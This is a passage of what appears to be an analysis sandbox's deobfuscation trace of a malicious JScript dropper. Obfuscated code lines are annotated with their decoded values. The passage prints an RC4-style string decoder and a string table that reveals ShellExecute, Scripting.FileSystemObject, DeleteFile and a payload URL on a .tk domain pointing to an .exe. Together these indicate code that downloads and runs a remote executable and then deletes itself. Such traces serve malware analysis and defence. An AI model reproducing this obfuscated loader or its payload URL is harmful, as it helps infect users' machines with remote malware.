"fromCharCode" _0x1315bc(220) ➔ "fromCharCode" _0x1315bc(220) ➔ "fromCharCode"
107	{
108	_0x20589b = _0x2441a2['indexOf'] ( _0x20589b );
109	}
110	for ( var _0x52a501 = 0x0, _0xd68c99 = _0x5162e5[_0x1315bc ( 0xdf ) ] ; _0x52a501 < _0xd68c99 ; _0x52a501 ++ )	_0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length" _0x1315bc(223) ➔ "length"
111	{
112	_0x2d3365 += '%' + ( '00' + _0x5162e5[_0x1315bc ( 0x100 ) ] ( _0x52a501 ) [_0x1315bc ( 0xc8 ) ] ( 0x10 ) )['slice'] ( - 0x2 );	_0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString" _0x1315bc(256) ➔ "charCodeAt" _0x1315bc(200) ➔ "toString"
113	}
114	return decodeURIComponent ( _0x2d3365 );	decodeURIComponent("%db%bf%5b%82%f1%87") ➔ undefined decodeURIComponent("%54%27%c2%bf%c2%89%c2%bc%c3%84%c2%b8%c2%ba%04%03%45%c2%b8") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8" decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" decodeURIComponent("%c3%86%c2%95%c3%b4%3a%3a%c2%b3%c2%83%c3%8b%00%c2%8d%7f%c2%a0%27") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'" decodeURIComponent("%b5%83%c4") ➔ undefined decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" decodeURIComponent("%b0%24%48%3d%32%0d%19%f2%0b%12%c6%12%4c%43%28%04%91%02") ➔ undefined decodeURIComponent("%b0%24%48%3d%32%0d%19%f2%0b%12%c6%12%4c%43%28%04%91%02") ➔ undefined decodeURIComponent("%1d%34%cf%4b%ff%d3%18%2f%17%4c%af%d3%4f%fb%e7%ce%f9%dc%c6%49%23%b1%f1%17") ➔ undefined decodeURIComponent("%f7%de%7c%f7%c7%45%18%49%0d") ➔ undefined
115	},
116	_0x229c24 = function (_0x29b9bf, _0x8f1407) {	function (_0x10ff05, _0x54c045).AOWVVX("279BGVghm","mX5") ➔ undefined function (_0x10ff05, _0x54c045).AOWVVX("vcFcV8kjWRZdHmk4WROea0xcUa","mX5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02" function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki" function (_0x10ff05, _0x54c045).AOWVVX("W4BcLCo0oJRcS8kdW4SaWO1/WQaN","W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1" function (_0x10ff05, _0x54c045).AOWVVX("Type","4(W") ➔ undefined function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","mX5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc" function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","RY1%") ➔ undefined function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","mX5") ➔ undefined function (_0x10ff05, _0x54c045).AOWVVX("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","mX5") ➔ undefined function (_0x10ff05, _0x54c045).AOWVVX("995898DfgeKn","m*X5") ➔ undefined
117	var _0x4eb5d1 = _0x562b2c, _0x3fff08 = _0x5099, _0x540d16 = [], _0x7b0d9d = 0x0, _0x582129, _0x19cf9c = '';
118	_0x29b9bf = _0x1c1988 ( _0x29b9bf );	_0x1c1988("279BGVghm") ➔ undefined _0x1c1988("vcFcV8kjWRZdHmk4WROea0xcUa") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8" _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" _0x1c1988("W4BcLCo0oJRcS8kdW4SaWO1/WQaN") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'" _0x1c1988("Type") ➔ undefined _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f" _0x1c1988("Scripting.FileSystemObject") ➔ undefined _0x1c1988("Scripting.FileSystemObject") ➔ undefined _0x1c1988("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined _0x1c1988("995898DfgeKn") ➔ undefined
119	var _0x249fdc;
120	for ( _0x249fdc = 0x0 ; _0x249fdc < 0x100 ; _0x249fdc ++ )
121	{
122	_0x540d16[_0x249fdc] = _0x249fdc;
123	}
124	for ( _0x249fdc = 0x0 ; _0x249fdc < 0x100 ; _0x249fdc ++ )
125	{
126	_0x7b0d9d = ( _0x7b0d9d + _0x540d16[_0x249fdc] + _0x8f1407[_0x3fff08 ( 0xf8, 'dX[e' ) ] ( _0x249fdc % _0x8f1407[_0x4eb5d1 ( 0xdf ) ] ) ) % 0x100, _0x582129 = _0x540d16[_0x249fdc], _0x540d16[_0x249fdc] = _0x540d16[_0x7b0d9d], _0x540d16[_0x7b0d9d] = _0x582129;	_0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length" _0x3fff08(248,"dX[e") ➔ "charCodeAt" _0x4eb5d1(223) ➔ "length"
127	}
128	_0x249fdc = 0x0, _0x7b0d9d = 0x0;
129	for ( var _0x287833 = 0x0 ; _0x287833 < _0x29b9bf[_0x3fff08 ( 0xd4, 'Uvs9' ) ] ; _0x287833 ++ )	_0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length" _0x3fff08(212,"Uvs9") ➔ "length"
130	{
131	_0x249fdc = ( _0x249fdc + 0x1 ) % 0x100, _0x7b0d9d = ( _0x7b0d9d + _0x540d16[_0x249fdc] ) % 0x100, _0x582129 = _0x540d16[_0x249fdc], _0x540d16[_0x249fdc] = _0x540d16[_0x7b0d9d], _0x540d16[_0x7b0d9d] = _0x582129, _0x19cf9c += String[_0x3fff08 ( 0xcc, 'pkRk' ) ] ( _0x29b9bf[_0x4eb5d1 ( 0x100 ) ] ( _0x287833 ) ^ _0x540d16[( _0x540d16[_0x249fdc] + _0x540d16[_0x7b0d9d] ) % 0x100] );	_0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt" _0x3fff08(204,"pkRk") ➔ "fromCharCode" _0x4eb5d1(256) ➔ "charCodeAt"
132	}
133	return _0x19cf9c;
134	};
135	_0x5b6c['AOWVVX'] = _0x229c24, _0x573185 = arguments, _0x5b6c[_0x21482c ( 0xe4, 'Uvs9' ) ] = ! ! [];	_0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY" _0x21482c(228,"Uvs9") ➔ "qCVKfY"
136	}
137	var _0x5f031d = _0x3d4abd[0x0], _0x41a554 = _0x10ff05 + _0x5f031d, _0x465855 = _0x573185[_0x41a554];
138	return ! _0x465855 ? ( _0x5b6c[_0x562b2c ( 0xd0 ) ] === undefined && ( _0x5b6c['RzXUsr'] = ! ! [] ), _0x325444 = _0x5b6c[_0x21482c ( 0x108, 'oE&(' ) ] ( _0x325444, _0x54c045 ), _0x573185[_0x41a554] = _0x325444 ) : _0x325444 = _0x465855, _0x325444;	_0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("279BGVghm","mX5") ➔ undefined _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("vcFcV8kjWRZdHmk4WROea0xcUa","mX5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02" _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki" _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("W4BcLCo0oJRcS8kdW4SaWO1/WQaN","W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1" _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("Type","4(W") ➔ undefined _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","mX5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc" _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","RY1%") ➔ undefined _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","mX5") ➔ undefined _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","mX5") ➔ undefined _0x562b2c(208) ➔ "RzXUsr" _0x21482c(264,"oE&(") ➔ "AOWVVX" function (_0x10ff05, _0x54c045).AOWVVX("995898DfgeKn","m*X5") ➔ undefined
139	}, _0x5b6c ( _0x573185, _0x30822b );
140	}
141	function _0xe99d(_0x304024, _0x5125dd) {	_0xe99d(234) ➔ "DeleteFile" _0xe99d(260) ➔ "push" _0xe99d(234) ➔ "W4ZdJrRdRue" _0xe99d(260) ➔ "76392yWuOtG" _0xe99d(233) ➔ "DeleteFile" _0xe99d(234) ➔ "421620Dulpsf" _0xe99d(260) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa" _0xe99d(233) ➔ "W4ZdJrRdRue" _0xe99d(234) ➔ "282elZIVv" _0xe99d(260) ➔ "5991OPUtAM"
142	var _0x3974d = _0x3974 ( );	_0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW _0x3974() ➔ 